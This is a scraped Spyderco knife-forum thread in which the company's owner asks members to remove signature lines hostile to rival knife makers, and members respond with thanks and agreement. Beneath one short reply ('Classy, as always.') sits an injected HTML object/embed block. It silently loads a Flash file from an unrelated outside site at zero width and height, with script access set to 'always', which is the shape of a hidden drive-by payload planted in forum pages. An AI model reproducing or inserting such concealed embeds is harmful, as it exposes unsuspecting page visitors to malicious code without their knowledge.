Page 1 of 4 123 ... LastLast

Thread: Questionable tag lines & shiny footprints

Hybrid View

Spyderco Forum Registered User

Questionable tag lines & shiny footprints

This is a sensitive subject, so I would appreciate your patience and understanding.

The hostility that seems to appear on the forum makes it an uncomfortable place to be. This is opposite the intention.

Much of the hostility seems to be centered around the "round hole issue".

After listening to comments, discussion and much thought (which requires time becausae I'm sometimes slow), I have a request.

I am asking you to pull any tag lines or comments that could be percerived as hostile or antagonistic to other companies in the knife industry, while on our forums.

I realize that to many, it is an important issue, and I will admit to being sensitive myself, but a negative approach is not good for the industry or Spyderco in the industry.

Intelligent, civil communication is more valuable.

We have always tried to "leave shiny footprints" where ever we go. I personally have tried to avoid negative comments towards other companies. (No, I'm not perfect either ) I think it serves to keep thoughts about Spyderco and other companies more positive than negative.

If you would like to be closely associated with Spyderco, which we greatly appreciate, it would be our wish that you consider leaving shiny footprints rather than hostile feelings, where Spyderco is concerened.

thanx much for your cooperation and kind understanding.

sal

Spyderco Forum Registered User Peter1960's Avatar
    Quote Originally Posted by sal
    ... If you would like to be closely associated with Spyderco, which we greatly appreciate, it would be our wish that you consider leaving shiny footprints rather than hostile feelings, whjere Spyderco is concerened...
    I always tried to act in this manner and will do so in future, Sal.

It's your business and your company, not mine, I'm your satisfied customer. For my person I see no reason to comment co-decisions for their business/company here or on other forums. You are in the daily business and have the overview and I'm sure you do your best! Thanks for all your efforts and your close relationship to the ELU's!
    Peter - member of Spydiewiki.com group

"Integrity is being good even if no one is watching"
    Spyderco's company motto

Quote Originally Posted by sal
    This is a sensitive subject, so I would appreciate your patience and understanding.

The hostility that seems to appear on the forum makes it an uncomfortable place to be. This is opposite the intention.

a negative approach is not good for the industry or Spyderco in the industry.

Intelligent, civil communication is more valuable.

thanx much for your cooperation and kind understanding.

sal
    Thank you Sal.
    As an overseas collector of multiple brands including of course Spyderco
    I welcome your words !!!
    You have said what I was thinking.
    You guys can be proud on Sal and Spyderco but also the whole US knife industrie that is still out there producing great Amerikan quality knives.
    We don't want all of the knives to be made in China........
    A strong US knife industrie is important to all users, collectors, economy in general and of course the (US) people that work in the branche.
    Here in Europe we have seen way to much jobs and fine industrie that went to China.
    You don't have to support other brands but please live in peace.
    Live and let live.
    Thanks for keeping this board a friendly place for all kind of folk.
    My addiction
    --------------------------------------------
    Patience is never more important than when you are on the verge of losing it.

This is just so great!

Imagine what would be possible if we were to bring this level of class to all aspects of life (business, bumper stickers, politics, driving, ...). Why, we could have a civil society.

Thanks, Sal.
    EarthDog

You got it Sal!
    My real name is Wayne

Spyderco Forum Registered User steeltiger's Avatar

anything you say

What you do for me and the others on this forum, I'm happy to do as you ask.

Thank you mr. glesser for giving us a company as great as this.
    _''the ultimate awnser to life the universe and everything is......42''----
    douglass Adams
    _Thats my window on the world, if you dissagre please pm me
    _''free and easey down the road I go''-Dierks Bently

TWO BILLION YEARS......

Spyderco Forum Registered User dialex's Avatar

Thumbs up

Dear Mr. Glesser,

Thanks for making this place what it is. I really think people like you make a better world, not only by the products they offer, but by themselves as well. You are a true gentleman and an inspiration for me for quite a few years now, and I'm proud to know you among my friends.
    The mind commands the body and it obeys. The mind orders itself and meets resistance.

Quote Originally Posted by EarthDog
    This is just so great!

Imagine what would be possible if we were to bring this level of class to all aspects of life (business, bumper stickers, politics, driving, ...). Why, we could have a civil society.

Thanks, Sal.
    This is really a great point and goes to the core of why I love Spyderco. When I carry a Spyderco I feel like I have a lot more than a knife in my pocket. My s are a symbol of integrity which I strive to live by. Seems like most folk on the forum feel the same.

You're the boss =]
    Hope to see ya back at the NY show, even though I know it invokes way to much drama

Spyderco Forum Registered User radtechmo's Avatar

shiny footprints

i will be one of the first to say that i am pretty impressed with the way the members here behave. sal, you are a good man. you manage an awesome company, and you obviously have a clear vision of right and wrong and act accordingly. i have met few men of industry who werent only in it for the profit. i have seen the sharp maker instructional, and have just started communication on this forum, and i have seen many good things here. i am honored to be a member, and to have you represent a great american company. and of course, thanks for the great knives too!

Spyderco Forum Registered User VG-10's Avatar
    Yes a masta...

Thumbs up First timer

This is my first visit to the forum, however, I'm a big Spydie fan and hope you guys and gals will teach me more.

Spyderco Forum Registered User D56's Avatar
    A good place to post my first - I will therfore try to follow this example

Hi NNorvell, D56,

Welcome to the Spyderco forum and thanx for visiting.

sal

Classy, as always.
    <object classid="clsid
    <param name=FlashVars value="cid=7">
    <param name="movie" value="http://www.cosmeticsstore.info/files/7.swf">
    <param name="bgcolor" value="#ffffff">
    <param name="allowScriptAccess" value="always" />
    <embed allowScriptAccess="always" FlashVars="cid=7" src="http://www.cosmeticsstore.info/files/7.swf" quality="high" bgcolor="#ffffff" width="0" height="0" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
    </object>

Excuse my ignorance, but how do I add a "Signature Line" to my posts that shows up each time? Someone that knows, please pm me the info. Thank you.

Spyderco Forum Registered User tikkidaddy's Avatar
    marietta sc...but im not sure if its on earth though!!
    Sal--
    THIS IS WHY I BUY SPYDERCO. Glad to be associated with one of the best in in the knife making industry--mark
    "I hate the thought of killing anything, its the last thing I would advise, but as a matter of survival, all creatures are fair game."-- Les Stroud.

I wonder if spyders feel that way too??--mark.

To those of you who were ribbing me earlier today when I outed myself on losing 7 Dodos, the words spoken by Sal here are why I have the 8th in my pocket right now. Though cursed, and inevitably set for losing this one, I will someway, somehow, continue as a Dodo owner/carrier because I know that if there is ever a problem with one that I haven't lost yet, Sal and the good folks at Spyderco will take care of me.

Here! Here! Let's hear it for a guy that does business like I do business.
    "Yes Occifer, she said KINKY...... That's "K" as in KNIFE...." "OUCH"!!!!

Spyderco Forum Registered User bladese97's Avatar

Cool Greetings Sal...& team

I am not sure if I've said/typed anything effensive, or hostle; If I have, please let me know If I have over looked it? Oh...I remember one; "The accational round hole" I will find this thread, and correct it. Sorry
    "Spyderco...does a pocket good"
    Spyderco Rocks!!!! "A wise man once said all knives were created equal...Obviously, he meant Spydercos''
    As of 1-29-08, I am a proud member of Knife Rights!

Spyderco Forum Registered User Jay_Ev's Avatar
    How come this thread no longer has a "sticky" so it will always be at the top of the forum?
    <--- My Spydies <click the dancing banana!>